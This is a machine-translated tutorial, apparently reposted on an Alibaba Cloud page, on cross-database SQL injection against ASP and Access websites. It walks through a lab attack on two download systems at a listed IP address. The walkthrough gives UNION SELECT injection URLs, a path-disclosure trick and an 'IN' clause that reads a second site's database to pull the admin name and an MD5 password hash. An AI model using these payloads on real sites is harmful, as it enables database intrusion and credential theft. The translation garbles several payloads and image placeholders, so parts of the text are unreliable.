Cross-database query of Access (figure)

Source: Internet
Author: User
Tags mysql injection perl script

You still remember mssql's cross-database query. In fact, cross queries between two data items can be implemented in access. Next I will introduce the cross-database query of access.
First, let's take a look at how to query mdb files in access. We can create an empty database to query the database D: \ daos \ db \ daidalos. the content of the admin table in mdb is queried. The SQL statement is:
Javascript: if (this. width> 500) this. width = 500 "border = 0>
After the query, the system returns the content in the admin table of the target database:
Javascript: if (this. width> 500) this. width = 500 "border = 0>
In actual asp injection, two select statements are required at the same time. If you are familiar with php + mysql injection, it is easy to think of union queries, we can still use it in access. Another advantage of using union to query data is not to guess data one by one, the data in the field can be exposed directly like mysql + php injection (the specific mix has already written a detailed article ). It can be seen from the above that cross-database query requires the following two conditions:
The number of fields in the table in the previous select statement must be known when the union statement is used.
You must know the location of the target database, absolute path.
Condition 1 can be manually guessed based on the error message, or automatically implemented through the program.
Condition 2 is difficult, but we can use the "access brute-force database" to implement it. Some people will say that since we can know the data location, we will not download it directly, currently, databases generally prevent downloading, and some are not in the web directory.
The first level of the fourth round of the anti-DDoS pro lab is the two asp + access download systems. One is the rain point Download System and the other is the stolen handsome Download System. After testing, the hacker downloading system can expose the database, but does not allow the download. It seems that there is no injection, and the downloading system in the rain is full of loopholes. The database can be violent and can be directly downloaded, injection is also possible. However, the background of the rain point is very simple and there is nothing to use. Our goal is to get the password of the background of the hacker. I will show it to you, obtain the background password of the hacker through cross-database query by the injection points of the rain point system:
We know that the list. asp of the rain point system can be injected. We first need to get the number of data table fields in the union, and submit:
Http: // 219.237.81.46/yddown/list. asp? Id = 75% 20 union % 20 select % 201% 20 from % 20 userinfo

Return Value:
Microsoft JET Database Engine error '80040e14'
The two data tables selected in the joint query or the columns in the query do not match.
/Yddown/list. asp, row 51

The field is incorrect. I wrote a perl script to automatically guess the field (see the code below)
When we submit:
Http: // 219.237.81.46/yddown/list. asp? Id = 75% 20 union % 20 select % 3%, 20 from % 20 userinfo

No error returned:
Javascript: if (this. width> 500) this. width = 500 "border = 0>
Haha! We have obtained the number of fields, and we can get the data that we query at the position of Field 1.
Now we are still at the database location where the hacker is handsome. Let's simply submit the following:
Http: // 219.237.81.46/dsdown % 5cregs. asp

Successful return path:
Microsoft JET Database Engine error '20140901'
'D: \ 111 \ db \ kljdsld. asa' is not a valid path. Check whether the path name is correctly spelled and whether it is connected to the server where the file is stored.
/Dsdown/db/user. asp, Row 6

(Note: The obtained path is not necessarily "complete". The actual path is D: \ 111 \ dsdown \ db \ kljdsld. asa)
Next we construct a url across databases as follows:
Http: // 219.237.81.46/yddown/list. asp? Id = 75% 20 union % 20 select % 20 admin, 3,2% 20 from % 20 admin % 20in % 20 "D: \ 111 \ dsdown \ db \ kljdsld. asa "% 20 where % 20id = 1

  
The preceding statement is: union queries data D: \ 111 \ db \ kljdsld. the admin data of the id = 1 field in the admin table in the asa directly exposes the user name managed in the background if it is successful:
Javascript: if (this. width> 500) this. width = 500 "border = 0>
The username is admin, and then the brute-force password is obtained:
Http: // 219.237.81.46/yddown/list. asp? Id = 75% 20 union % 20 select % 20pws, 3,2% 20 from % 20 admin % 20in % 20 "D: \ 111 \ dsdown \ db \ kljdsld. asa "% 20 where % 20id = 1

  
Javascript: if (this. width> 500) this. width = 500 "border = 0>
We can get a 32-bit md5-encrypted hash: 77e6cbb3f9468eadb655ae6826357922. The cross-database query is successful. Here I just want to demonstrate the cross-database query, and the anti-DDOS service does not work here :).
Summary
This article mainly introduces two very useful methods. 1st we don't have to guess each character at the top of asp injection, so it is very troublesome to have Chinese characters, directly Using union instead of data can directly expose the data, regardless of whether it is a Chinese character or a special character, can be put in place in one step, 2nd is a cross-database, the use is very flexible, can let you during penetration, there are unexpected gains.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.